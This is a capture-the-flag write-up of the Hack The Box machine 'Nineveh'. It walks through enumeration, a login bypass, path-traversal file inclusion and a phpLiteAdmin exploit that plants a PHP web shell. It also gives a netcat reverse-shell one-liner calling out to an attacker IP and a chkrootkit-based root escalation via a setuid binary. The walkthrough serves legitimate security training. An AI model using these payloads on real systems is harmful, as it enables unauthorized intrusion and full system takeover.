Welcome to the Nineveh writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k


Nineveh

tags: HTB Medium Linux OSCP
Platform: Hackthebox
Difficult: Medium
S.O.: Linux

Enumeration

Nmap

To get started, we run a quick open ports scan.

# nmap -p- -T4 10.10.10.43
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-19 08:47 CET
Nmap scan report for 10.10.10.43
Host is up (0.094s latency).
Not shown: 65533 filtered ports
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 91.62 seconds

Now that we know the open ports, let's scan them in depth.

# nmap -A -Pn -p 80,443 10.10.10.43
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-19 08:57 CET
Nmap scan report for 10.10.10.43
Host is up (0.093s latency).

PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after:  2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%), Linux 4.4 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   93.65 ms 10.10.14.1
2   93.64 ms 10.10.10.43

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.99 seconds

Gobuster

# gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://nineveh.htb/ -x php,html,txt,bak -t 200 2>/dev/null
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://nineveh.htb/
[+] Threads:        200
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,html,txt,bak
[+] Timeout:        10s
===============================================================
2021/03/19 09:11:49 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.txt (Status: 403)
/.htpasswd.bak (Status: 403)
/.htaccess (Status: 403)
/.htaccess.txt (Status: 403)
/.htaccess.bak (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.html (Status: 403)
/department (Status: 301)
/index.html (Status: 200)
/info.php (Status: 200)
/server-status (Status: 403)
===============================================================
2021/03/19 09:13:04 Finished
===============================================================

Well, we have found the info.php file that executes phpinfo() and the /department directory where we access a login form in which, if we see the source code, we can see a commented line that lets us know of two possible users admin and amrois.

<!-- @admin! MySQL is been installed.. please fix the login page! ~amrois -->

Bypassing login form

As we can see, the form is vulnerable to the enumeration of users and entering the user admin reports an incorrect password, so we will try to bypass adding [] to the password input from the browser inspector or Burp .

Once we have authenticated as admin we can read that it has a note that says the following.

· Have you fixed the login page yet! hardcoded username and password is really bad idea!

· check your serect folder to get in! figure it out! this is your challenge

· Improve the db interface.
~amrois

Exploitation

LFI

If we click on Notes from the top menu, we see that it is doing manage.php?Notes=files/ninevehNotes.txt which we can surely use for an LFI. To check this, we can add any letter to the end of the file.

After doing several tests, I have been able to verify that we need to keep files/ninevehNotes or else it filters the injection so, we should be able to do for exampleNotes=files/ninevehNotes.php/../../../../../../etc/passwd and it should work.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
amrois:x:1000:1000:,,,:/home/amrois:/bin/bash
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin

And with notes=files/ninevehNotes.php/../../../info.php we can include for example the file info.php

After many unsuccessful tests with the LFI, we will try to find the secret directory mentioned in the note. In addition to looking for it in port 80 we will also look for it in port 443 since it is a different web server as we can see when accessing it.

# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://nineveh.htb/ -k -t 50 2>/dev/null
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://nineveh.htb/
[+] Threads:        50
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/03/19 20:34:19 Starting gobuster
===============================================================
/db (Status: 301)
/server-status (Status: 403)
/secure_notes (Status: 301)
===============================================================
2021/03/19 20:42:04 Finished
===============================================================

Well, inside https://nineveh.htb/db/ we can find a phpLiteAdmin and the secure_notes path.

Inside the secure_notes directory I don't find anything interesting but inside db we have an access form that only requires a password, so by brute force I managed to get the password password123 to access.

Exploitation

As we can see in this link, the phpLiteAdmin has a RCE vulnerability. Let's attack it!

The first step is create a new database with a short name to use the LFI with it at the last step.

Now, we need to create a new table with some name.

Well, inside it, we need to setup the column with some name, with type as text and with the default value as the payload <?php passthru($_REQUEST["cmd"]);?>.

Perfect, as we can see in the database structure, the database file is in /var/tmp/a

Is time to use it with the LFI.

http://nineveh.htb/department/manage.php?notes=files/ninevehNotes.php/../../../../../../var/tmp/a&cmd=id

And... We got RCE! Let's go for the shell!

We are going to use the following shell encoded in URL

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.7 8787 >/tmp/f

And now, with a terminal listening, we access the URL.

http://nineveh.htb/department/manage.php?notes=files/ninevehNotes.php/../../../../../../var/tmp/a&cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%2010.10.14.7%208787%20%3E%2Ftmp%2Ff
# nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.43] 52156
sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

Post exploitation

Enumeration

Pspy

By running pspy64 we can find the chkrootkit script running every minute by root. If we search the internet a bit, we can find a vulnerability in this script capable of giving us root directly.

2021/03/21 12:20:02 CMD: UID=0    PID=10687  | /bin/sh /usr/bin/chkrootkit 

Privilege escalation

To achieve the privilege scale, we are going to create a directory that is assigned the uid of root and we will save it in /var/tmp/suid.

int main() {
    setuid(0);
    system("/bin/sh");
    return 0;
}

Now, we are going to create the payload as /tmp/update with the following content and set it as executable.

www-data@nineveh:/tmp$ echo '#!/bin/bash' > /tmp/update; echo "chown root:root /var/tmp/suid; chmod 4755 /var/tmp/suid" >> /tmp/update
www-data@nineveh:/tmp$ chmod +x /tmp/update

Now we just have to wait for chkrootkit to run and assign SUID permissions to our file.

www-data@nineveh:/var/tmp$ ls -la
total 48
drwxrwxrwt  5 root     root      4096 Mar 21 12:52 .
drwxr-xr-x 14 root     root      4096 Jul  2  2017 ..
-rwsr-xr-x  1 root     root     16664 Mar 21 12:30 suid
www-data@nineveh:/var/tmp$ ./suid 
# id
uid=0(root) gid=33(www-data) groups=33(www-data)
# cat /home/amrois/user.txt
CENSORED_FLAG
# cat /root/root.txt
CENSORED_FLAG
#